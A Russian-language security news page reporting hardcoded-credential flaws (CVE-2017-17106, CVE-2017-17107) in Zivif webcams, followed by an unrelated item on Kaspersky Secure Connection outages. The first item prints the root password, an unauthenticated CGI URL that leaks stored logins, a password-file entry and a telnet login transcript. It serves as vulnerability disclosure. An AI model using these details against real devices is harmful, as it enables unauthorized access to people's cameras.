В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Веб-камеры Zivif PR115-204-P-RS V2.3.4.2103 содержат жестко закодированный пароль cat1029, использующийся для пользователя root. Настройка операционной системы SONIX делает этот пароль неизменяемым, соответственно, его можно использовать для доступа к устройству через сеанс TELNET.

Как утверждают специалисты, камерам Zivif недостает контроля доступа, в результате функции CGI можно вызывать напрямую, обходя проверки подлинности.

Проблема получила идентификатор CVE-2017-17106, заключается она в том, что камера на запрос http://<Адрес Камеры>/web/cgi-bin/hi3510/param.cgi?cmd=getuser отвечает следующим образом:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0

Учетные данные возвращаются в текстовом виде.

Также эксперты отметили в файле /etc/passwd наличие жестко закодированной записи (CVE-2017-17107): 

root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

Зашифрованный пароль - cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$

Из-за того, как структурирована файловая система, изменение этого пароля составит нетривиальную задачу.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

У россиян массово сбоит Kaspersky Secure Connection

Ряд российских пользователей сталкивается со сбоями в работе Kaspersky Secure Connection — сервиса «Лаборатории Касперского» для безопасной передачи трафика. У людей появляются ошибки подключения, приложение зависает на этапе «подключение к удалённому серверу» и не проходит инициализацию.

В пресс-службе компании подтвердили, что неполадки действительно есть:

«В последние несколько дней часть пользователей Kaspersky Secure Connection могут испытывать сложности с подключением. Чтобы приложение работало корректно, пользователям из России следует убедиться, что они используют лицензию, выпущенную для российского региона, а также что приложение обновлено до актуальной версии».

По данным Runet, техподдержка уже несколько дней не отвечает на обращения некоторых пользователей. Представители компании эту ситуацию не прокомментировали.

Модератор пользовательского форума «Лаборатории Касперского» пояснил, что проблемы чаще всего возникают у тех, кто покупал лицензии не для российского региона, а также оформлял подписку на «Яндекс Маркете». По его словам, таких пользователей в пятницу автоматически перевели на другой сетевой сервис.

«Таких подписчиков перевели на Pure. Но он из России практически не работает. Кроме того, там меньше серверов, всего один протокол, отсутствует двойной и нет конфигураций для роутеров», — сообщил модератор.

Ситуация с последними сбоями остаётся не до конца ясной. Пока пользователям рекомендуют проверять актуальность лицензии и версии приложения, но часть владельцев зарубежных подписок сообщает, что сервис фактически перестал работать.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru